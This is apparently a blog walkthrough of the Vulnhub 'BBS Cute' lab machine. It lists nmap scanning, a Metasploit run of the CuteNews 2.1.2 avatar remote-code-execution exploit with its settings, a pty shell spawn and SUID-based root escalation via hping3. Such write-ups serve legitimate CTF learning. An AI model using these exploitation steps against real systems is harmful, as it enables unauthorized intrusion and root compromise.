Categories
Vulnhub Walkthrough

BBS Cute Vulnhub Walkthrough

Here is another Vulnerable machine called BBS Cute. It is available on vulnhub. it’s is another easy level Machine you can download here this machine. our goal is There are two flags on the box: a user and root flag.

Network Scanning

Let’s start with scan the network to obtain the IP address of the target machine. We will use the sudo netdiscover command.

sudo netdiscover

So, We have a target machine IP address in my case my target IP is 192.168.0.172, and our next step is to run Nmap aggressive scan to identify open port, and running services our host machine.

sudo nmap -A 192.168.43.172

As the Nmap scanning output results show four ports are open 22/SSH, 80/HTTP Apache Server, 88/HTTP Nginx Server, and 110/POP3 mail service running on the host machine.

Enumeration

Since we see our host machine scan output port 80 is open and running Apache HTTP Server, Let’s check the webpage in the browser by navigating the host machine IP.

http://192.168.43.172

and we see Apache2 Debian Default Page, After checking the page source code we skip the page and move the next step, changing some basic page extensions like index.html, index.php and we found the CuteNews Management login Panel.

http://192.168.43.172/index.php

We’re looking CuteNews Version and footer section we found the current version CuteNews is 2.1.2 we searched exploit for the cms version on exploit-db and we found the exploit ( CuteNews 2.1.2 – ‘avatar’ Remote Code Execution ) .

We download the exploit our local machine and add the exploit Metasploit-framework for adding new exploit in Metasploit-framework and we run the msfconsole and load the exploit but we fail to get reverse connection host machine.

and get an authenticate error then again we move the CMS panel and register our new user by navigating the URL

http://192.168.43.172/index.php?register

and again start the Metasploit-framework and load the cutenesw exploit, and some information about the module requires.

sudo msfconsole
use cutenews.rb
set rhosts 192.168.43.172
set username !!!!!!!
set password .......
set lport 4545
set targeturi /
run
shell
python -c 'import pty;pty.spawn("/bin/bash")'

After running the exploit we got a new meterpreter session, we run the shell command for the bash shell environment and start enumerating the machine and we found our first flag /home/fox directory.

cd /home
ls
cd fox
ls -ls
cat user.txt

Privilege Escalation

For Privilege Escalation we will check SUID Permission for our current user and we found useful binary file /usr/sbin/hping3, Let’s run the command, and we have a input field, we try to run id command and

our command is successfully executed we get information about the user and groups the user and we sure about the command this another unknown shell it has root permission.

find / -type f -perm -u=s 2>/dev/null
/usr/sbin/hping3
id

Let’s move the /root directory and reading our final flag root.txt

cd /root
ls
cat root.txt

By Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View Archive